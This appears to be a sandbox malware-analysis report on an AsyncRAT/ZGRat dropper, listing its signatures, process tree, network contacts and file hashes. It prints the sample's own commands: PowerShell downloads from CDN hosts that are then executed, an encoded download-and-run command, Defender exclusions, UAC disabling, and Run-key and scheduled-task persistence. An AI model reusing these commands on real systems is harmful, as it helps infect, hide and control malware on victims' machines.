Analysis Overview
SHA256
f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Threat Level: Known bad
The file resources.exe was found to be: Known bad.
Malicious Activity Summary
ZGRat
Detect ZGRat V1
UAC bypass
AsyncRat
Async RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
Drops startup file
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Creates scheduled task(s)
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-15 10:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-15 10:44
Reported
2023-11-15 10:46
Platform
win10v2004-20231023-en
Max time kernel
154s
Max time network
161s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Music\israil2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe | C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Music\RunNihaiersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\RunihaiVersion.exe | N/A |
| N/A | N/A | C:\Users\Public\Music\israil2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\2WinDefault.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4004 set thread context of 2812 | N/A | C:\Users\Admin\AppData\Roaming\WiDefault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2128 set thread context of 448 | N/A | C:\Users\Admin\AppData\Roaming\OperaCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4124 set thread context of 3312 | N/A | C:\Users\Admin\AppData\Roaming\VisualStudioo.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4712 set thread context of 1100 | N/A | C:\Users\Admin\AppData\Roaming\ChromeCrt.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 3312 set thread context of 2800 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\2WinDefault.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\resources.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1380 -ip 1380
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 804
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.105.26.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.52.96.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 31.219.227.13.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | textbin.net | udp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 212.177.72.148.in-addr.arpa | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | N/A | tcp |
| US | 8.8.8.8:53 | 69.103.1.46.in-addr.arpa | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:7355 | N/A | tcp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
| TR | 46.1.103.69:4263 | N/A | tcp |
Files
memory/2784-0-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/2784-1-0x0000000000980000-0x0000000000996000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat
| MD5 | d0cec99ca3a717c587689ebf399662c4 |
| SHA1 | 1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66 |
| SHA256 | b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228 |
| SHA512 | 99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7 |
memory/1496-4-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/1496-5-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1496-6-0x00000000027B0000-0x00000000027E6000-memory.dmp
memory/1496-7-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1496-8-0x0000000005030000-0x0000000005658000-memory.dmp
memory/1496-9-0x0000000004DD0000-0x0000000004DF2000-memory.dmp
memory/1496-10-0x00000000056D0000-0x0000000005736000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x5nqzt2r.rli.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1496-11-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/1496-21-0x00000000058B0000-0x0000000005C04000-memory.dmp
memory/1496-22-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
memory/1496-23-0x0000000005E60000-0x0000000005EAC000-memory.dmp
memory/1496-24-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1496-25-0x0000000007430000-0x0000000007AAA000-memory.dmp
memory/1496-26-0x00000000062A0000-0x00000000062BA000-memory.dmp
memory/2784-27-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/1496-31-0x0000000074D30000-0x00000000754E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/2168-33-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/2168-35-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/2168-34-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/2168-41-0x0000000005FA0000-0x00000000062F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b07e68c027ea6a742f8eb70028f3c4b3 |
| SHA1 | cd1d60ba3396b14413de92e65618c88703d5fc73 |
| SHA256 | 8452dfd10db3b1fba17015a6dba7948b5a76782beb84119602b097637e5ff912 |
| SHA512 | 1daa6b0564dc7866f88a1cd30ccfe4ec4d8552cb2e6505ab5241a323603c7b8ffd5bf06abb768d1fb3a3b1e36d162307aa6847a60f3be55d7e29768f936d9d90 |
memory/2168-47-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/2168-50-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/4436-52-0x0000000004EA0000-0x0000000004EB0000-memory.dmp
memory/4436-51-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/4436-53-0x0000000004EA0000-0x0000000004EB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2c7541283c2b98573c8e4af77affd1d |
| SHA1 | 00bd6af4931f06c8509039a9030ae0bf778d06f5 |
| SHA256 | 1bfc7cbefee83d45b424892998667d018bc6545541ac1003621b0e9e248c8f25 |
| SHA512 | d85df02776475e85e99428d45c929836f38a73485481d3ee2c872266b4a9a9ad395084976addd5c0336a09052e41e0f72c1bec0355e1b0965766930bb0d81f2e |
memory/4436-64-0x0000000004EA0000-0x0000000004EB0000-memory.dmp
memory/4436-67-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/2332-68-0x0000000074D30000-0x00000000754E0000-memory.dmp
memory/2332-69-0x0000000005580000-0x0000000005590000-memory.dmp
memory/2332-70-0x0000000005580000-0x0000000005590000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
